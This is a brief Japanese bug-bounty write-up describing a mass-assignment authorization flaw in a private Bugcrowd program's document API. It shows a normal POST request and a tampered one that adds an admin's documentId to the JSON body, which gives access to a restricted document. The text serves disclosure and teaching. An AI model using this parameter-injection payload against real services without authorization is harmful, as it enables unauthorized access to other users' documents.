Hello there, ('ω')ノ
追加のJSON本文コンテンツを含む制限付きドキュメントへのアクセスを。
脆弱性:
一括割り当て(Mass-assignment)
承認の欠陥
記事:
このプログラムはBugcrowdで非公開になっていて。
このプログラムで、ユーザはチーム内でドキュメントを送信、編集、管理できて。
ここでは2つのアカウントを使用して。
1つは管理者で、もう1つは通常のアカウントで。
管理者アカウントからドキュメントを作成して。
ドキュメントへのアクセスを許可せずに。
通常のアカウントからドキュメントにアクセスしようとすると。
すべてのAPIエンドポイントで403エラーが発生して。
自分のアカウントドキュメントを編集しているときの通常のアカウントから。
リクエストのjson本体にdocumentIdが含まれていることに気付いたので。
空白のドキュメントを作成しているときに。
jsonリクエストの本文にAdmindocumentIdを追加しようと思って。
通常のリクエスト:
POST /api/accounts/envelope/ HTTP/1.1
Host: redacted.com
{“enableResponsiveChoice”:false,”emailBlurb”:null,”emailSubject”:null,”autoNavigation”:false,”status”:”created”,”notification”:{“useAccountDefaults”:true}}
documentIdを追加したリクエスト:
POST /api/accounts/envelope/ HTTP/1.1
Host: redacted.com
{“enableResponsiveChoice”:false,”emailBlurb”:null,”emailSubject”:null,”autoNavigation”:false,”status”:”created”,”notification”:{“useAccountDefaults”:true},”documentId”:”documentIdofAdmin”}
リクエストを行うと管理ドキュメント情報を使用して。
新しいドキュメントが作成されて。
悲しいことに、これは自分のチームメンバー間でのみ悪用可能で。
ただ、後で同じ技術を使用していくつかの問題を発見して。
Best regards, (^^ゞ